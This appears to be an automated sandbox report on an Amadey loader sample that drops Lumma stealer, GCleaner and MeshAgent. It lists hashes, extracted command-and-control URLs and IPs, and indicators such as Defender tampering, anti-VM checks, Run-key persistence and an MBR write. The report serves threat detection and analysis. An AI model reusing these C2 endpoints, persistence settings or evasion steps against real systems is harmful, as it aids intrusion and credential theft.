amadey | ea186d0a7922a9cd82e3c87f054814c319574aa9aa745f4569121ff04244558a

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
04/04/2025, 18:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

random.exe
Size

1.8MB
MD5

6a7325ff6ccc9655bed64c6f407a0677
SHA1

20e9a2fc6b2abf6678de82282687b11cfc5e0ad6
SHA256

ea186d0a7922a9cd82e3c87f054814c319574aa9aa745f4569121ff04244558a
SHA512

9ea2aba0220472f70e19a2dbc866bc8dad102e5062245ac18ea04c1a1e8309a8a244746a9227e50b96a845da731f70e9ce8294d4da52a133b520dbcbd3fbc229
SSDEEP

24576:63aH3maKOJDok4/0slnCLpxfGi+UA618gekG7DmCYm6HSxW/Y9WLRG668TXYIVXK:1Bs+X8UckG7a1SxW/WkRFXdxnoj

Score

10^/10

amadey gcleaner lumma meshagent 092155 test123 backdoor bootkit defense_evasion discovery execution exploit loader persistence rat spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Extracted

Family

meshagent

Version

Botnet

test123

http://aaso12.duckdns.org:443/agent.ashx

Attributes

mesh_id
0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
wss
wss://aaso12.duckdns.org:443/agent.ashx

Extracted

Family

lumma

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://3z7advennture.top/GKsiio

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects MeshAgent payload 2 IoCs

resource	yara_rule
behavioral1/files/0x00070000000242f2-110.dat	family_meshagent
behavioral1/memory/5984-114-0x00007FF778DA0000-0x00007FF779115000-memory.dmp	family_meshagent

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent
Meshagent family
meshagent

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	934b30a571.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5b6cca16d1.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	a2bd676b9e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	66a7aa70aa.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4216	powershell.exe
7792	powershell.exe
3252	powershell.exe
3868	powershell.exe
9000	powershell.exe
10096	powershell.exe
10596	powershell.exe
11148	powershell.exe
1924	powershell.exe
3140	powershell.exe
384	powershell.exe
3092	powershell.exe
5108	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 17 IoCs

flow	pid	Process
761	6344	svchost.exe
882	4416	rapes.exe
882	4416	rapes.exe
1448	4416	rapes.exe
29	4416	rapes.exe
29	4416	rapes.exe
29	4416	rapes.exe
29	4416	rapes.exe
29	4416	rapes.exe
29	4416	rapes.exe
29	4416	rapes.exe
29	4416	rapes.exe
415	4852	svchost015.exe
471	4416	rapes.exe
517	2276	svchost015.exe
625	4416	rapes.exe
625	4416	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
4160	takeown.exe
5460	icacls.exe

Sets service image path in registry 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	s.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	s.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\G8TJsg_4328\ImagePath = "\\??\\C:\\Windows\\Temp\\VSn9rv6_4328.sys"	tzutil.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 18 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	66a7aa70aa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	934b30a571.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	934b30a571.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	41ba928451.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a2bd676b9e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	66a7aa70aa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5b6cca16d1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5b6cca16d1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	41ba928451.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a2bd676b9e.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	random.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	7IIl2eE.exe

Deletes itself 1 IoCs

pid	Process
916	w32tm.exe

Executes dropped EXE 31 IoCs

pid	Process
4416	rapes.exe
1592	apple.exe
1436	262.exe
5908	262.exe
848	f31e7a8e6f.exe
4852	svchost015.exe
4556	MeshAgent.exe
3424	934b30a571.exe
2276	svchost015.exe
408	rapes.exe
3144	RLPhvHg.exe
5296	5b6cca16d1.exe
4288	41ba928451.exe
5300	3d892e07dd.exe
3348	7q8Wm5h.exe
6880	a2bd676b9e.exe
4748	7IIl2eE.exe
5920	Passwords.com
6960	66a7aa70aa.exe
6520	FrameworkName.exe
3736	UZPt0hR.exe
924	rapes.exe
1500	MeshAgent.exe
4328	tzutil.exe
916	w32tm.exe
6248	TbV75ZR.exe
7652	RLPhvHg.exe
12732	9sWdA2p.exe
6740	qhjMWht.exe
11352	Rm3cVPI.exe
11552	caee2cc982.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	a2bd676b9e.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	66a7aa70aa.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	934b30a571.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine	5b6cca16d1.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4160	takeown.exe
5460	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3d892e07dd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450170101\\3d892e07dd.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b6cca16d1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450150101\\5b6cca16d1.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\41ba928451.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10450160101\\41ba928451.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PHYSICALDRIVE0	66a7aa70aa.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000900000002431f-330.dat	autoit_exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\advapi32.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\dbghelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\exe\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shell32.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CBFFDB613B6658B4269969596C20475A559806DD	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CBFFDB613B6658B4269969596C20475A559806DD	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shcore.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\1282BC313E25E822DF0BA064F5D9BA35CB7C5E03	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ws2_32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	MeshAgent.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
6244	tasklist.exe
6716	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
4368	random.exe
4416	rapes.exe
3424	934b30a571.exe
408	rapes.exe
5296	5b6cca16d1.exe
6880	a2bd676b9e.exe
6960	66a7aa70aa.exe
924	rapes.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 848 set thread context of 4852	848	f31e7a8e6f.exe	173
PID 3424 set thread context of 2276	3424	934b30a571.exe	187
PID 6248 set thread context of 6228	6248	TbV75ZR.exe	272
PID 6520 set thread context of 12864	6520	FrameworkName.exe	293
PID 11552 set thread context of 11484	11552	caee2cc982.exe	298

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.msh	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe

Drops file in Windows directory 14 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	random.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5636	sc.exe
5368	sc.exe
5440	sc.exe
1376	sc.exe
3048	sc.exe
452	sc.exe
2404	sc.exe
5604	sc.exe
336	sc.exe
1020	sc.exe
1488	sc.exe
3776	sc.exe
5464	sc.exe
1264	sc.exe
2512	sc.exe
3328	sc.exe
4876	sc.exe
420	sc.exe
2212	sc.exe
4424	sc.exe
2472	sc.exe
5216	sc.exe
4348	sc.exe
3060	sc.exe
5416	sc.exe
2344	sc.exe
2056	sc.exe
1332	sc.exe
1840	sc.exe
2040	sc.exe
3944	sc.exe
6120	sc.exe
5212	sc.exe
2396	sc.exe
1636	sc.exe
5496	sc.exe
3268	sc.exe
6108	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	3d892e07dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	66a7aa70aa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	random.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3d892e07dd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
